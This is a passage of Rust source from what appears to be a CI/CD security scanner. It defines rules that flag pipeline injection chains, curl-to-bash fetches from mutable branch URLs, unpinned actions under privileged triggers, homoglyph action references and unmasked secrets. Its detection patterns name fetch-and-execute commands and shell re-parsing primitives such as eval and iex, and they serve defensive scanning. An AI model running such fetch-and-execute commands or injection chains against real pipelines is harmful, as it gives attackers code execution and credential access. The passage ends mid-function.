2682            severity: Severity::Medium,
2683            category: FindingCategory::ParameterInterpolationIntoShell,
2684            path: None,
2685            nodes_involved: vec![step.id],
2686            message: format!(
2687                "Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
2688                step.name, names
2689            ),
2690            recommendation: Recommendation::Manual {
2691                action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
2692            },
2693            source: FindingSource::BuiltIn,
2694                extras: FindingExtras::default(),
2695});
2696    }
2697
2698    findings
2699}
2700
2701/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
2702/// expansion, a 2-step injection chain.
2703///
2704/// **Phase 1 (capture step):** an inline ADO script body
2705/// (`META_SCRIPT_BODY`) that contains BOTH:
2706///   - a "terraform output capture" signal — either a literal `terraform
2707///     output` CLI invocation (with or without `-raw <name>` / `-json`),
2708///     OR a reference to a `TF_OUT_*` env var (the standard naming
2709///     convention for env vars sourced from a `TerraformCLI@*`
2710///     `command: output` task), AND
2711///   - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
2712///
2713/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
2714/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
2715/// shell-expansion position, where "shell-expansion position" is any of:
2716///   - inside `bash -c "..."` / `bash -c '...'`
2717///   - inside `eval "..."` / `eval '...'` / `eval $(...)`
2718///   - inside command substitution `$(... $(NAME) ...)`
2719///   - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
2720///     in the same script
2721///   - bare unquoted `$(NAME)` as a command word (line-leading)
2722///
2723/// **Severity: High.** Terraform state/outputs are often controlled by
2724/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
2725/// access controls than the pipeline itself. The `task.setvariable` hop
2726/// launders attacker-controlled state through pipeline-variable space —
2727/// existing rules see only the in-step view.
2728pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
2729    // Step 0: collect every Step (in graph insertion order, which matches
2730    // YAML order) that carries a non-empty script body. Group by job name.
2731    struct StepInfo<'a> {
2732        id: NodeId,
2733        name: &'a str,
2734        body: &'a str,
2735    }
2736    let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
2737        std::collections::BTreeMap::new();
2738    for step in graph.nodes_of_kind(NodeKind::Step) {
2739        let body = match step.metadata.get(META_SCRIPT_BODY) {
2740            Some(b) if !b.is_empty() => b.as_str(),
2741            _ => continue,
2742        };
2743        let job = step
2744            .metadata
2745            .get(META_JOB_NAME)
2746            .map(String::as_str)
2747            .unwrap_or("");
2748        by_job.entry(job).or_default().push(StepInfo {
2749            id: step.id,
2750            name: step.name.as_str(),
2751            body,
2752        });
2753    }
2754
2755    let mut findings = Vec::new();
2756
2757    for (_job_name, steps) in by_job.iter() {
2758        // Phase 1: scan every step in this job for capture+setvariable.
2759        // Each capture step yields zero-or-more (variable_name) outputs.
2760        let captures: Vec<(usize, Vec<String>)> = steps
2761            .iter()
2762            .enumerate()
2763            .filter_map(|(idx, s)| {
2764                let vars = capture_phase_variables(s.body);
2765                if vars.is_empty() {
2766                    None
2767                } else {
2768                    Some((idx, vars))
2769                }
2770            })
2771            .collect();
2772
2773        if captures.is_empty() {
2774            continue;
2775        }
2776
2777        // Phase 2: for each capture step, look at all later steps in the
2778        // same job. For each later step, find any captured variable name
2779        // whose `$(NAME)` reference appears in shell-expansion position
2780        // within that later step's body.
2781        for (cap_idx, vars) in &captures {
2782            for later_idx in (cap_idx + 1)..steps.len() {
2783                let sink = &steps[later_idx];
2784                let mut hits: Vec<&str> = Vec::new();
2785                for var in vars {
2786                    if expansion_in_shell_position(sink.body, var) {
2787                        hits.push(var.as_str());
2788                    }
2789                }
2790                if hits.is_empty() {
2791                    continue;
2792                }
2793                hits.sort();
2794                hits.dedup();
2795                let cap = &steps[*cap_idx];
2796                let names = hits.join(", ");
2797                findings.push(Finding {
2798                    severity: Severity::High,
2799                    category:
2800                        FindingCategory::TerraformOutputViaSetvariableShellExpansion,
2801                    path: None,
2802                    nodes_involved: vec![cap.id, sink.id],
2803                    message: format!(
2804                        "Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
2805                        cap.name,
2806                        names,
2807                        sink.name,
2808                        hits[0],
2809                    ),
2810                    recommendation: Recommendation::Manual {
2811                        action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
2812                    },
2813                    source: FindingSource::BuiltIn,
2814                    extras: FindingExtras::default(),
2815                });
2816            }
2817        }
2818    }
2819
2820    findings
2821}
2822
2823/// Phase-1 helper: given an inline-script body, return the list of
2824/// pipeline-variable names that the body sets via
2825/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
2826/// contains a "terraform output capture" signal.
2827///
2828/// We do not attempt to data-flow-link the captured value to the
2829/// `setvariable` directive — the proximity within a single inline script
2830/// is the operative signal. The two corpus exemplars
2831/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
2832/// capture and the setvariable inside the same PowerShell block.
2833fn capture_phase_variables(body: &str) -> Vec<String> {
2834    if !body_has_terraform_output_capture(body) {
2835        return Vec::new();
2836    }
2837    setvariable_names_in(body)
2838}
2839
/// True iff the body contains a terraform-output capture signal.
///
/// Signals, any one of which suffices:
/// * a literal `terraform output` CLI invocation (with or without
///   subcommand arguments);
/// * a POSIX-shell expansion of a `TF_OUT_*` variable — `$TF_OUT_X` or
///   `${TF_OUT_X}`;
/// * a PowerShell expansion of the same — `$env:TF_OUT_X` or
///   `${env:TF_OUT_X}`, in any letter case.
///
/// `TF_OUT_*` is the naming convention for env vars sourced from a
/// `TerraformCLI@*` `command: output` task.
fn body_has_terraform_output_capture(body: &str) -> bool {
    // Literal CLI invocation. Case-sensitive because the terraform CLI is
    // always lowercase.
    if body.contains("terraform output") {
        return true;
    }

    // POSIX shell: variable names are case-sensitive, so match exactly. The
    // leading `$` keeps unrelated identifiers such as `MY_TF_OUT_X` (or
    // `$MY_TF_OUT_X`) from matching.
    const POSIX_MARKERS: [&str; 2] = ["$TF_OUT_", "${TF_OUT_"];
    if POSIX_MARKERS.iter().any(|marker| body.contains(*marker)) {
        return true;
    }

    // PowerShell: the `env:` drive qualifier and variable names are
    // case-insensitive, so `$Env:TF_OUT_X` / `$ENV:tf_out_x` are the same
    // reference as `$env:TF_OUT_X`.
    const POWERSHELL_MARKERS: [&str; 2] = ["$env:tf_out_", "${env:tf_out_"];
    let lower = body.to_ascii_lowercase();
    POWERSHELL_MARKERS
        .iter()
        .any(|marker| lower.contains(*marker))
}
2864
/// Extract the variable names set by every
/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
///
/// * The directive text is matched case-insensitively
///   (`##vso[task.setVariable variable=...]` is recognised too), in line
///   with how `script_launders_spn_token` detects the same directive.
/// * `variable=` must be the first property, separated from the command by
///   a single space.
/// * NAME ends at the first `;`, `]` or whitespace character and is
///   returned with its original casing.
/// * Names containing anything other than ASCII alphanumerics, `_` or `.`
///   (e.g. an un-expanded `$name`) are dropped.
///
/// The result is sorted and de-duplicated.
fn setvariable_names_in(body: &str) -> Vec<String> {
    const NEEDLE: &str = "##vso[task.setvariable variable=";

    // ASCII-only lower-casing never changes byte lengths, so offsets found
    // in `haystack` are valid slice indices into `body`.
    let haystack = body.to_ascii_lowercase();

    let mut out: Vec<String> = Vec::new();
    let mut cursor = 0;
    while let Some(rel) = haystack[cursor..].find(NEEDLE) {
        let start = cursor + rel + NEEDLE.len();
        let tail = &body[start..];
        let end = tail
            .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
            .unwrap_or(tail.len());
        let name = &tail[..end];
        if !name.is_empty()
            && name
                .chars()
                .all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.')
        {
            out.push(name.to_string());
        }
        // Resume after the name so the same directive is not matched twice.
        cursor = start + end;
    }
    out.sort();
    out.dedup();
    out
}
2892
/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
/// position? "Shell-expansion position" means the value will be parsed by
/// a shell or PowerShell interpreter at runtime, rather than being fed
/// into a function/cmdlet that quotes its arguments.
///
/// Returns false when `$(name)` does not occur in `body` at all. Otherwise
/// returns true if ANY of the following holds:
///
/// 1. The script contains, anywhere, one of the re-parsing primitives
///    `bash -c`, `sh -c`, `eval ` (case-sensitive) or `Invoke-Expression`,
///    `iex`, `Invoke-Command`, `-split` (case-insensitive, since PowerShell
///    is). This is a whole-body check: the primitive need not be on the
///    same line as `$(name)`.
/// 2. Some occurrence of `$(name)` sits inside another `$( ... )` on the
///    same line, judged by counting `$(` against `)` in the text before it.
/// 3. A line begins (after indentation) with `$(name)`, i.e. the value is
///    used as the command word.
fn expansion_in_shell_position(body: &str, name: &str) -> bool {
    let needle = format!("$({name})");
    if !body.contains(&needle) {
        return false;
    }

    // Cheap whole-body checks: if the script contains any of these
    // primitives anywhere, an interpolation of `$(name)` elsewhere in the
    // same script is at risk.
    const POSIX_SIGILS: [&str; 3] = ["bash -c", "sh -c", "eval "];
    const POWERSHELL_SIGILS: [&str; 6] = [
        "invoke-expression",
        " iex ",
        "iex(",
        "iex (",
        "invoke-command",
        "-split",
    ];
    if POSIX_SIGILS.iter().any(|sigil| body.contains(*sigil)) {
        return true;
    }
    let lower = body.to_ascii_lowercase();
    if POWERSHELL_SIGILS.iter().any(|sigil| lower.contains(*sigil)) {
        return true;
    }

    body.lines().any(|line| {
        // Bare line-leading reference: the value is parsed as a command
        // line. Quoted assignments such as `$x = "$(name)"` never start
        // with the needle, so they are not caught here.
        if line.trim_start().starts_with(&needle) {
            return true;
        }
        // Nested command substitution: `$(... $(name) ...)`. ADO's
        // `$(macro)` and POSIX `$(cmd)` share the same surface syntax; more
        // `$(` than `)` before an occurrence means it sits inside an
        // unclosed substitution. Naive (no real balancing) but adequate for
        // inline scripts. Every occurrence on the line is examined.
        line.match_indices(needle.as_str()).any(|(pos, _)| {
            let prefix = &line[..pos];
            prefix.matches("$(").count() > prefix.matches(')').count()
        })
    })
}
2952
// ── runtime_script_fetched_from_floating_url ──────────────────
//
// Detect `run:` blocks that download a remote script from a non-pinned URL
// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
// vector — neither `unpinned_action` (which inspects `uses:`) nor
// `floating_image` (containers) covers it.
//
// Detection primitive (one logical line must show both):
//   1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
//      `curl … | sudo bash`, `bash <(curl …)`, or `deno run https://…`
//   2. URL is mutable: contains `refs/heads/`, `/HEAD/`, `/main/`,
//      `/master/`, `/develop/`, `/trunk/` or `/latest/`.
//      (A raw `git clone`/`fetch` from a branch URL is not detected.)
//
// Severity: High (one upstream commit lands code on every consumer).

/// Returns `true` when some logical line of `body` both executes remotely
/// fetched code and mentions a mutable URL marker (see
/// `line_url_is_mutable`).
///
/// A "logical line" is a physical line with its backslash continuations
/// joined, so `curl URL \` followed by `| bash` is seen as one command.
/// A pipe into a shell only counts when the script invokes `curl` or `wget`
/// somewhere; process substitution (`<(curl`, `<(wget`) and
/// `deno run http(s)://` are matched as literal substrings.
fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
    // Interpreters that count as an execution sink after a pipe.
    const SHELLS: [&str; 2] = ["bash", "sh"];

    // `word` is a shell name followed by a word boundary, so `sh`, `bash`
    // and `sh;` match while `sha256sum`, `shasum` and `shuf` do not.
    fn is_shell_word(word: &str) -> bool {
        SHELLS.iter().any(|shell| match word.strip_prefix(*shell) {
            Some(rest) => !rest.starts_with(|c: char| c.is_ascii_alphanumeric() || c == '_'),
            None => false,
        })
    }

    // True when any `|` on the line feeds a shell, optionally via `sudo`
    // and its dash-prefixed flags (`| sudo -E bash -`).
    fn pipes_into_shell(line: &str) -> bool {
        line.split('|').skip(1).any(|after_pipe| {
            let mut words = after_pipe.split_whitespace();
            let mut command = words.next();
            if command == Some("sudo") {
                command = words.find(|word| !word.starts_with('-'));
            }
            matches!(command, Some(word) if is_shell_word(word))
        })
    }

    // Joins physical lines that end in a backslash continuation.
    fn logical_lines(body: &str) -> Vec<String> {
        let mut joined = Vec::new();
        let mut pending = String::new();
        for raw in body.lines() {
            match raw.trim_end().strip_suffix('\\') {
                Some(head) => {
                    pending.push_str(head);
                    pending.push(' ');
                }
                None => {
                    pending.push_str(raw);
                    joined.push(std::mem::take(&mut pending));
                }
            }
        }
        // A trailing continuation with nothing after it still counts.
        if !pending.is_empty() {
            joined.push(pending);
        }
        joined
    }

    let invokes_fetcher = body.contains("curl") || body.contains("wget");

    logical_lines(body).iter().any(|line| {
        let fetch_and_exec = invokes_fetcher
            && (pipes_into_shell(line) || line.contains("<(curl") || line.contains("<(wget"));
        let deno_remote =
            line.contains("deno run http://") || line.contains("deno run https://");

        (fetch_and_exec || deno_remote) && line_url_is_mutable(line)
    })
}

/// Returns `true` when `line` contains a path segment that names a moving
/// ref rather than a fixed version.
///
/// The marker list is the conservative core: flagging every URL without a
/// version-like segment would catch more, at the cost of precision.
fn line_url_is_mutable(line: &str) -> bool {
    // Mutable URL markers.
    const MUTABLE_PATHS: &[&str] = &[
        "refs/heads/",
        "/HEAD/",
        "/main/",
        "/master/",
        "/develop/",
        "/trunk/",
        "/latest/",
    ];
    MUTABLE_PATHS.iter().any(|marker| line.contains(*marker))
}
3030
3031/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
3032/// the URL is pinned to a mutable branch ref. The remote host's branch tip
3033/// becomes a write-anywhere primitive on the runner.
3034///
3035/// Severity: High.
3036pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
3037    let mut findings = Vec::new();
3038
3039    for step in graph.nodes_of_kind(NodeKind::Step) {
3040        let body = match step.metadata.get(META_SCRIPT_BODY) {
3041            Some(b) if !b.is_empty() => b,
3042            _ => continue,
3043        };
3044
3045        if !body_has_pipe_to_shell_with_floating_url(body) {
3046            continue;
3047        }
3048
3049        findings.push(Finding {
3050            severity: Severity::High,
3051            category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
3052            path: None,
3053            nodes_involved: vec![step.id],
3054            message: format!(
3055                "Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
3056                step.name
3057            ),
3058            recommendation: Recommendation::Manual {
3059                action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
3060            },
3061            source: FindingSource::BuiltIn,
3062                extras: FindingExtras::default(),
3063});
3064    }
3065
3066    findings
3067}
3068
// ── pr_trigger_with_floating_action_ref ────────────────────────
//
// Detect the high-severity conjunction: the workflow runs in privileged
// base-repo context (`pull_request_target` / `issue_comment` /
// `workflow_run`) AND uses at least one action by mutable ref (not SHA).
// Each condition alone is reported by another rule; together they are
// critical, because the trigger grants write-token authority *and* the
// floating action lets an attacker substitute the executed code.

/// Returns `true` when `trigger` — a single trigger name or a
/// comma-separated list, as stored under `META_TRIGGER` — names at least one
/// of `pull_request_target`, `issue_comment` or `workflow_run`. Entries are
/// trimmed and compared exactly.
fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
    const PRIVILEGED: [&str; 3] = ["pull_request_target", "issue_comment", "workflow_run"];

    trigger
        .split(',')
        .map(str::trim)
        .any(|entry| PRIVILEGED.contains(&entry))
}
3084
3085/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
3086///
3087/// Severity: Critical (full repo write token + attacker-controlled action code).
3088pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3089    let trigger = match graph.metadata.get(META_TRIGGER) {
3090        Some(t) => t.as_str(),
3091        None => return Vec::new(),
3092    };
3093    if !trigger_is_privileged_pr_class(trigger) {
3094        return Vec::new();
3095    }
3096
3097    let mut findings = Vec::new();
3098    let mut seen = std::collections::HashSet::new();
3099
3100    for image in graph.nodes_of_kind(NodeKind::Image) {
3101        // Skip first-party (local actions, self-hosted runner labels).
3102        if image.trust_zone == TrustZone::FirstParty {
3103            continue;
3104        }
3105        // Skip container images (covered by floating_image).
3106        if image
3107            .metadata
3108            .get(META_CONTAINER)
3109            .map(|v| v == "true")
3110            .unwrap_or(false)
3111        {
3112            continue;
3113        }
3114        // Skip self-hosted-runner Image nodes (those are FirstParty anyway,
3115        // but be defensive against future refactors).
3116        if image.metadata.contains_key(META_SELF_HOSTED) {
3117            continue;
3118        }
3119        // Already SHA-pinned (semantically valid) → safe.
3120        if is_pin_semantically_valid(&image.name) {
3121            continue;
3122        }
3123        // Dedupe per action reference.
3124        if !seen.insert(&image.name) {
3125            continue;
3126        }
3127
3128        findings.push(Finding {
3129            severity: Severity::Critical,
3130            category: FindingCategory::PrTriggerWithFloatingActionRef,
3131            path: None,
3132            nodes_involved: vec![image.id],
3133            message: format!(
3134                "Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
3135                image.name
3136            ),
3137            recommendation: Recommendation::PinAction {
3138                current: image.name.clone(),
3139                pinned: format!(
3140                    "{}@<sha256-digest>",
3141                    image.name.split('@').next().unwrap_or(&image.name)
3142                ),
3143            },
3144            source: FindingSource::BuiltIn,
3145                extras: FindingExtras::default(),
3146});
3147    }
3148
3149    findings
3150}
3151
3152// ── homoglyph_in_action_ref ──────────────────────────────────
3153//
3154// Detect `uses:` action references containing non-ASCII characters.
3155// Legitimate action references (owner/repo@ref) are purely ASCII.
3156// Non-ASCII characters indicate a possible Unicode confusable / homoglyph
3157// attack where a malicious action name visually impersonates a trusted one.
3158
3159/// Rule G2: action reference contains non-ASCII characters (possible homoglyph).
3160///
3161/// Iterates every `Image` node in the graph (which represent `uses:` action
3162/// refs) and flags any whose name contains at least one non-ASCII code point.
3163/// Severity: High — potential supply-chain impersonation attack.
3164pub fn check_homoglyph_in_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3165    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
3166    if platform != Some("github-actions") {
3167        return Vec::new();
3168    }
3169
3170    let mut findings = Vec::new();
3171
3172    for image in graph.nodes_of_kind(NodeKind::Image) {
3173        if image.name.is_ascii() {
3174            continue;
3175        }
3176
3177        // Collect the offending non-ASCII characters for the message.
3178        let bad_chars: Vec<String> = image
3179            .name
3180            .chars()
3181            .filter(|c| !c.is_ascii())
3182            .map(|c| format!("U+{:04X} '{}'", c as u32, c))
3183            .collect();
3184        let char_list = bad_chars.join(", ");
3185
3186        findings.push(Finding {
3187            severity: Severity::High,
3188            category: FindingCategory::HomoglyphInActionRef,
3189            path: None,
3190            nodes_involved: vec![image.id],
3191            message: format!(
3192                "Action reference '{}' contains non-ASCII character(s) (possible homoglyph/confusable): {}",
3193                image.name, char_list
3194            ),
3195            recommendation: Recommendation::Manual {
3196                action: "Replace the action reference with the genuine ASCII action name. Verify the action owner/repo on github.com and ensure every character in the `uses:` field is plain ASCII.".into(),
3197            },
3198            source: FindingSource::BuiltIn,
3199            extras: FindingExtras::default(),
3200        });
3201    }
3202
3203    findings
3204}
3205
// ── untrusted_api_response_to_env_sink ────────────────────────
//
// Detect privileged-trigger workflows that capture an external API
// response (gh CLI, curl against api.github.com) and write it into the GHA
// environment file. A poisoned API field (branch name, PR title, commit
// message) injects environment variables into every subsequent step in the
// same job.

/// Returns `true` when `body` has a line that writes to a GHA gate file
/// (`$GITHUB_ENV`, `$GITHUB_OUTPUT`, `$GITHUB_PATH`, bare or `${…}` form)
/// at most six lines after — or on the same line as — a GitHub API call
/// (`gh pr view`, `gh pr list`, `gh api `, `gh issue view`, or any mention
/// of `api.github.com`).
///
/// There is no dataflow analysis: "the most recent API line is close above
/// the sink" approximates capture-then-write idioms such as
/// `gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`, while keeping
/// false-positive risk acceptable. A sink that appears only *before* the
/// API call does not match.
fn body_writes_api_response_to_env_sink(body: &str) -> bool {
    // The source: gh CLI or a direct REST call.
    const API_CALL_MARKERS: &[&str] = &[
        "gh pr view",
        "gh pr list",
        "gh api ",
        "gh issue view",
        "api.github.com",
    ];
    // The sink: a reference to one of the GHA gate files.
    const ENV_SINK_MARKERS: &[&str] = &[
        "$GITHUB_ENV",
        "${GITHUB_ENV}",
        "$GITHUB_OUTPUT",
        "${GITHUB_OUTPUT}",
        "$GITHUB_PATH",
        "${GITHUB_PATH}",
    ];
    // Largest line distance from the latest API call to the sink.
    const MAX_LINE_GAP: usize = 6;

    fn contains_any(line: &str, markers: &[&str]) -> bool {
        markers.iter().any(|marker| line.contains(*marker))
    }

    // One pass is enough: a same-line source+sink has distance 0, and a body
    // lacking either a source or a sink can never satisfy the check below.
    let mut last_api_line: Option<usize> = None;
    for (idx, line) in body.lines().enumerate() {
        if contains_any(line, API_CALL_MARKERS) {
            last_api_line = Some(idx);
        }
        if contains_any(line, ENV_SINK_MARKERS)
            && matches!(
                last_api_line,
                Some(api_idx) if idx.saturating_sub(api_idx) <= MAX_LINE_GAP
            )
        {
            return true;
        }
    }

    false
}
3287
3288/// Rule: workflow_run-triggered workflow writes an API response value to the
3289/// GHA environment gate. Branch name / PR title in the response can carry
3290/// newline-injected env-var assignments.
3291///
3292/// Severity: High.
3293pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
3294    let trigger = match graph.metadata.get(META_TRIGGER) {
3295        Some(t) => t.as_str(),
3296        None => return Vec::new(),
3297    };
3298    let trigger_in_scope = trigger.split(',').any(|t| {
3299        let t = t.trim();
3300        matches!(t, "workflow_run" | "pull_request_target" | "issue_comment")
3301    });
3302    if !trigger_in_scope {
3303        return Vec::new();
3304    }
3305
3306    let mut findings = Vec::new();
3307
3308    for step in graph.nodes_of_kind(NodeKind::Step) {
3309        let body = match step.metadata.get(META_SCRIPT_BODY) {
3310            Some(b) if !b.is_empty() => b,
3311            _ => continue,
3312        };
3313
3314        if !body_writes_api_response_to_env_sink(body) {
3315            continue;
3316        }
3317
3318        findings.push(Finding {
3319            severity: Severity::High,
3320            category: FindingCategory::UntrustedApiResponseToEnvSink,
3321            path: None,
3322            nodes_involved: vec![step.id],
3323            message: format!(
3324                "Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
3325                step.name
3326            ),
3327            recommendation: Recommendation::Manual {
3328                action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
3329            },
3330            source: FindingSource::BuiltIn,
3331            extras: FindingExtras::default(),
3332        });
3333    }
3334
3335    findings
3336}
3337
// ── pr_build_pushes_image_with_floating_credentials ────────────
//
// Detect: workflow triggered by a PR-class event uses a container-registry
// login action that is NOT SHA-pinned. The login action receives credentials
// (OIDC token or static registry secret) — a compromise of the action's
// branch lets an attacker exfiltrate them.

/// Returns `true` when `action` (an `owner/repo[@ref]` reference) names a
/// known registry/cloud login action, or any action whose name ends in one
/// of the generic login suffixes (`/login-to-gar`, `/dockerhub-login`,
/// `/login-to-ecr`, `/login-to-acr`).
///
/// Everything from the first `@` on is ignored. The comparison is
/// ASCII-case-insensitive: GitHub resolves owner and repository names
/// without regard to case, and several of these actions are canonically
/// written with capitals (`Azure/login`, `Azure/docker-login`).
fn is_registry_login_action(action: &str) -> bool {
    const KNOWN_LOGIN_ACTIONS: &[&str] = &[
        "docker/login-action",
        "aws-actions/amazon-ecr-login",
        "aws-actions/configure-aws-credentials",
        "azure/docker-login",
        "azure/login",
        "google-github-actions/auth",
        "google-github-actions/setup-gcloud",
    ];
    const LOGIN_SUFFIXES: &[&str] = &[
        "/login-to-gar",
        "/dockerhub-login",
        "/login-to-ecr",
        "/login-to-acr",
    ];

    let bare = action
        .split('@')
        .next()
        .unwrap_or(action)
        .to_ascii_lowercase();

    KNOWN_LOGIN_ACTIONS.contains(&bare.as_str())
        || LOGIN_SUFFIXES.iter().any(|suffix| bare.ends_with(*suffix))
}
3360
/// Returns `true` when `trigger` — a single name or a comma-separated list —
/// contains `pull_request` or `pull_request_target`; both are PR-class.
/// Entries are trimmed and compared exactly.
fn trigger_includes_pull_request(trigger: &str) -> bool {
    trigger
        .split(',')
        .map(str::trim)
        .any(|event| matches!(event, "pull_request" | "pull_request_target"))
}
3368
3369/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
3370/// action. Compound vector: floating action holds registry creds + PR-controlled
3371/// image content reaches a shared registry.
3372///
3373/// Severity: High.
3374pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
3375    let trigger = match graph.metadata.get(META_TRIGGER) {
3376        Some(t) => t.as_str(),
3377        None => return Vec::new(),
3378    };
3379    if !trigger_includes_pull_request(trigger) {
3380        return Vec::new();
3381    }
3382
3383    let mut findings = Vec::new();
3384    let mut seen = std::collections::HashSet::new();
3385
3386    for image in graph.nodes_of_kind(NodeKind::Image) {
3387        if image.trust_zone == TrustZone::FirstParty {
3388            continue;
3389        }
3390        if image
3391            .metadata
3392            .get(META_CONTAINER)
3393            .map(|v| v == "true")
3394            .unwrap_or(false)
3395        {
3396            continue;
3397        }
3398        if !is_registry_login_action(&image.name) {
3399            continue;
3400        }
3401        if is_pin_semantically_valid(&image.name) {
3402            continue;
3403        }
3404        if !seen.insert(&image.name) {
3405            continue;
3406        }
3407
3408        findings.push(Finding {
3409            severity: Severity::High,
3410            category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
3411            path: None,
3412            nodes_involved: vec![image.id],
3413            message: format!(
3414                "PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
3415                image.name
3416            ),
3417            recommendation: Recommendation::PinAction {
3418                current: image.name.clone(),
3419                pinned: format!(
3420                    "{}@<sha256-digest>",
3421                    image.name.split('@').next().unwrap_or(&image.name)
3422                ),
3423            },
3424            source: FindingSource::BuiltIn,
3425            extras: FindingExtras::default(),
3426        });
3427    }
3428
3429    findings
3430}
3431
3432/// Rule: ADO `##vso[task.setvariable]` with a sensitive-named variable
3433/// that omits `issecret=true` (either `issecret=false` or no `issecret`
3434/// flag at all). Without the flag the variable value is printed in
3435/// plaintext to the pipeline log and is not masked in downstream step
3436/// output.
3437///
3438/// Detection (per Step):
3439///   * `META_PLATFORM == "azure-devops"` (gates GHA/GitLab out)
3440///   * Step carries a non-empty `META_SCRIPT_BODY`
3441///   * Body contains `##vso[task.setvariable variable=NAME ...]` where
3442///     NAME (case-insensitive) matches a sensitive keyword: `password`,
3443///     `passwd`, `token`, `secret`, `key`, `credential`, `cert`,
3444///     `apikey`, `auth`
3445///   * The directive does NOT contain `issecret=true` (case-insensitive)
3446///     between `variable=NAME` and the closing `]`
3447///
3448/// Severity: High.
3449pub fn setvariable_issecret_false(graph: &AuthorityGraph) -> Vec<Finding> {
3450    if !graph_is_platform(graph, "azure-devops") {
3451        return Vec::new();
3452    }
3453
3454    const SENSITIVE_KEYWORDS: &[&str] = &[
3455        "password",
3456        "passwd",
3457        "token",
3458        "secret",
3459        "key",
3460        "credential",
3461        "cert",
3462        // "api_key" omitted: tokenizer splits on '_', so this keyword can never
3463        // match a single token — "key" already covers AZURE_API_KEY etc.
3464        "apikey",
3465        "auth",
3466    ];
3467
3468    let needle = "##vso[task.setvariable variable=";
3469
3470    let mut findings = Vec::new();
3471
3472    for step in graph.nodes_of_kind(NodeKind::Step) {
3473        let body = match step.metadata.get(META_SCRIPT_BODY) {
3474            Some(b) if !b.trim().is_empty() => b,
3475            _ => continue,
3476        };
3477
3478        let lower = body.to_lowercase();
3479        let mut cursor = 0;
3480
3481        while let Some(rel) = lower[cursor..].find(needle) {
3482            let start = cursor + rel + needle.len();
3483            let tail = &lower[start..];
3484
3485            // Extract variable name (terminated by `;`, `]`, or whitespace).
3486            let name_end = tail
3487                .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
3488                .unwrap_or(tail.len());
3489            let var_name = &tail[..name_end];
3490
3491            if var_name.is_empty() {
3492                cursor = start + name_end;
3493                continue;
3494            }
3495
3496            // Token-split on `_`/`-` so "key" matches STORAGE_ACCOUNT_KEY but not "keyvaultname".
3497            let is_sensitive = var_name
3498                .split(['_', '-'])
3499                .any(|tok| SENSITIVE_KEYWORDS.contains(&tok));
3500
3501            if !is_sensitive {
3502                cursor = start + name_end;
3503                continue;
3504            }
3505
3506            // Grab the rest of the directive up to `]` to check for issecret.
3507            let directive_end = tail.find(']').unwrap_or(tail.len());
3508            let directive_tail = &tail[..directive_end];
3509            let has_issecret_true = directive_tail.contains("issecret=true");
3510
3511            if !has_issecret_true {
3512                // Recover the original-case variable name from the body.
3513                let orig_name = &body[start..start + name_end];
3514
3515                findings.push(Finding {
3516                    severity: Severity::High,
